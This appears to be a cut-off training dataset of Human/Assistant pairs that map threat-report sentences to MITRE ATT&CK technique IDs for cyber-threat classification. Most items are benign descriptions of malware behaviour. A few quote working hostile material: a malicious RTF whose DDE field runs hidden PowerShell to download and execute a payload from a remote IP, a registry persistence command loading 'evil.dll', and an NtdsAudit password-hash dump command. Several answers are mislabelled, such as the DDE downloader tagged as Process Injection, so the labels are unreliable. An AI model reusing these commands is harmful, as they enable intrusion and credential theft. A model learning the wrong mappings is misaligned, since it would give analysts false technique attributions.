T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regin has used a hidden file system to store some of its components.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA uses WMI to perform process monitoring.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has used a netbios scanner for remote machine identification.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has compromised social media accounts to conduct social engineering attacks.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The GuLoader executable has been retrieved via embedded macros in malicious Word documents.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, live memory modification of the operating system can be combined with ROMMONkit to achieve persistence.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie can multiple protocols including HTTP and HTTPS in communication with command and control servers.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus can collect system drive information, the computer name, and the size of the disk.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum's loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy uses the Camellia cipher to encrypt communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 also used an HTTP malware variant to communicate over HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLAINTEE collects general system enumeration data about the infected machine and checks the OS version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has the ability to remove files and folders related to previous infections.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop has used the sleep command to avoid sandbox detection.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER will send the captured screenshot image file to the C2 server if the “fileupload” command is issued### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda decrypts strings in the code during the execution process.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar obtains a list of running processes through WMI querying and the ps command.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 wrote the encrypted and base64-encoded PowerShell backdoor code into that property### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, it is possible to load a DLL at logon using a ""Depend"" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d ""C:\temp\evil.dll"" The following Registry keys can be used to set startup folder items for persistence: * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders The following Registry keys can control automatic startup of services during boot: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The backdoor has the capability to download and upload files, execute shell commands, and update its configuration.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShell supports several profiles depending on the user or host program.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can collect the username from the victim's machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex has used POST requests and HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy that can be set up by an adversary and used in phishing campaigns.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer’s main backdoor connected to a remote C2 server using HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic encrypts commands from the C2 server using a hardcoded key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,adbupd contains a copy of the OpenSSL library to encrypt C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware KiloAlfa contains keylogging functionality.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has enumerated network shares on a compromised host.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera specifically has used the NtdsAudit tool to dump the password hashes of domain users via cmsadcs.exe ""NTDS.dit"" -s ""SYSTEM"" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv and used ntdsutil to copy the Active Directory database.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used tracert to check internet connectivity.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The script saves the decoded and decompressed executable to %APPDATA%\Microsoft\Windows\Templates\WindowsTemplate.exe and creates an LNK shortcut at %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk to persistently run WindowsTemplate.exe each time Windows starts up### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch algorithm.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For comparison, if we were to inspect Fysbis “RemoteShell” associated strings in one of the stripped variants, we would only see the following: Figure 3: Sofacy Fysbis stripped binary string references to RemoteShell capability Compare this with what is available from the non-stripped variant: Figure 4: Sofacy Fysbis non-stripped binary strings referenes to RemoteShell capability Little static analysis gifts like these can help to speed defender enumeration of capabilities and – more importantly – further contribute to correlation and detection across related samples### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN can perform audio capture.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes can encrypt C2 traffic with AES or RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may Create Cloud Instance, mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has compiled the source code for a downloader directly on the infected system using the built-in Microsoft.CSharp.CSharpCodeProvider class.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,.iqy files are simple text files containing a URL which are opened by default by Excel### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ECCENTRICBANDWAGON can use cmd to execute commands on a victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 6 Example of delivery document The RTF document (8cf3bc2bf…) was very small in size at 264 bytes, which can be seen in its entirety here: {\rtf1{\field{\*\fldinst DDEAUTO ""C:\\\\WIndowS\\\\SYsTem32\\\\cMD.eXe "" ""/C POWErsHELl.eXE  -ex     BypaSs  -NOP -w      HIdDen  (NEw-oBjeCT SyStEm.NET.weBCLiENT).dowNloADFILe( 'hxxp://86.106.131[.]177/link/GRAPH.EXE'  ,       '%apPDAtA%\graph.exe'   )   ;       saps    '%Appdata%\graph.exe'""}}} The contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the Koadic payload from a remote server, save it as an executable file on the system and then execute the payload### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To support their operations, an adversary may need to take capabilities they developed or obtained and stage them on infrastructure under their control.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used tools to perform keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This means that any domain user can view the SYSVOL share and decrypt the password .### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has scanned network infrastructure for vulnerabilities as part of its operational planning.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can also search for specific files by supplied file mask.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pay2Key can identify the IP and MAC addresses of the compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ISAPI extensions and filters may have access to all IIS web requests and responses.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has established tmate sessions for C2 communications.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can identify whether it has been run previously on a host by checking for a specified folder.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An administrator can also configure a profile that applies to all users and host programs on the local computer.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used JScript for logging and downloading additional tools.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky searches for removable media and duplicates itself onto it.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk has the ability to check running processes on a targeted system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used C:\Windows\Debug and C:\Perflogs as staging directories.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 obfuscates strings and payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They could subsequently lock others out of the file.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can deliver Beacon payloads for lateral movement by leveraging remote COM execution.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,iKitten collects the keychains on the system.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The shellcode is not encrypted but is obfuscated### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DownPaper uses PowerShell to add a Registry Run key in order to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some examples of event types include system startup and user authentication.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldFinder has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Persona development consists of the development of public information, presence, history and appropriate affiliations.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has used batch scripts to download tools and executing cryptocurrency miners.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHIPSHAPE targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may purchase domains similar to legitimate domains during acquisition of infrastructure to help facilitate Drive-by Compromise.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hikit has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Endpoint systems may be compromised through browsing to adversary controlled sites, as in Drive-by Compromise.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT can add a new service to ensure PlugX persists on the system when delivered as another payload onto the system.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has installed a systemd service script to maintain persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has created a fake rm binary to replace the legitimate Linux binary.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has spread its coinminer via SSH.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used VBScript to drop and execute malware loaders.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has also used reg save on the SYSTEM file Registry location to help extract the NTDS.dit file.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MobileOrder exfiltrates data to its C2 server over the same protocol as C2 communications.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can disable Windows Defender.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore can change browser security settings to enable extensions to be installed.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may overwrite data in boot drivers or firmware such as BIOS and The Unified Extensible Firmware Interface to persist on systems at a layer below the operating system.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has waited a specified time before downloading a second stage payload.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The link provided in the malicious email led to a fake VPN Web Portal: Upon logging in with the credentials provided in the email, the victim is presented with the following page: The victim is asked to install the “VPN Client” (an .exe file), or, if download fails, to download a password protected zip (with the same .exe file inside)### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia creates a RAR archive based on collected files on the victim's machine.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has attempted to run Darkside ransomware with the filename sleep.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used password spraying to gain access to target systems.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FALLCHILL uses fake Transport Layer Security to communicate with its C2 server.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These sites may also have details highlighting business operations and relationships.### Assistant: T1594: Search Victim-Owned Websites" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has installed a service pointing to a malicious DLL dropped to disk.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT can check the default browser by querying HKCR\http\shell\open\command.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has subset groups like Bluenoroff who have used cryptocurrency mining software on victim machines.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has used Nt* Native API functions to inject code into legitimate processes such as wermgr.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows authentication package DLLs are loaded by the Local Security Authority process at system start.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can add Registry run keys for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may break out of a container to gain access to the underlying host.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo can send the data it collects to the C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information or Compromise Accounts and/or sending multiple, seemingly urgent messages.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot collects the users of the system.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has also encoded payloads using Base64 and a framework called ""Dont-Kill-My-Cat .### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The initial overlap was based on the filename wmssl.exe, which was seen as an executable name that Cannon would move the wmssl.txt attachment to install and execute a secondary payload### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Traps provides endpoint protection, as it can block Excel from creating a command prompt process### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail has the ability to receive and execute a self-delete command.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTML5 also introduced a download attribute that may be used to initiate file downloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLAINTEE uses reg add to add a Registry Run key for persistence.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 attempted to get users to click on Microsoft Office attachments containing malicious macro scripts.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has been delivered via spearphishing attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has run the xp_cmdshell command in MS-SQL.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon installer can use UAC bypass techniques to install the payload.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities .### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may access data objects from improperly secured cloud storage.### Assistant: T1530: Data from Cloud Storage Object" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT loads malicious shellcode and executes it in memory.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used RDP for direct remote point-and-click access.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has brute forced RDP credentials.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9] Figure 1: Lure Screenshots The group’s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has used a modified version of TeamViewer and Remote Utilities for remote access.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They also obtained ntds.dit from domain controllers.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can fingerprint architecture, computer name, and OS version on the compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba has a hardcoded list of services and processes to terminate.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data Exfiltration The second module Irdsnhrxxxfery98.~ is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Technical Databases, establishing operational resources or Obtain Capabilities, and/or initial access or External Remote Services.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dynamic-link libraries that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\ are loaded into every process that calls the ubiquitously used application programming interface functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBferry can detect the infected machine's network topology using ipconfig and arp.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PinchDuke collects user files from the compromised host based on predefined file extensions.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some of these security controls may be enabled by default, such as Driver Signature Enforcement on Windows or System Integrity Protection on macOS.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky created and used a mailing toolkit to use in spearphishing attacks.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases politically oriented image files have been used to overwrite data.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can enumerate processes on a victim machine through use of Tasklist.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JCry has been observed deleting shadow copies to ensure that data cannot be restored easily.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has hidden encoded data for malware DLLs in a PNG.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette has the ability to execute arbitrary JavaScript code on a compromised host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once established within a system or network, an adversary may use automated techniques for collecting internal data.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.### Assistant: T1609: Container Administration Command" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention network paths.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With sufficient permissions, adversaries can modify domain policy settings.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has developed its own unique malware for use in operations.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spark can collect the hostname, keyboard layout, and language from the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rifdoor has the ability to identify the IP address of the compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can utilize AppleScript and Native API calls to create a login item to spawn malicious executables.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Each 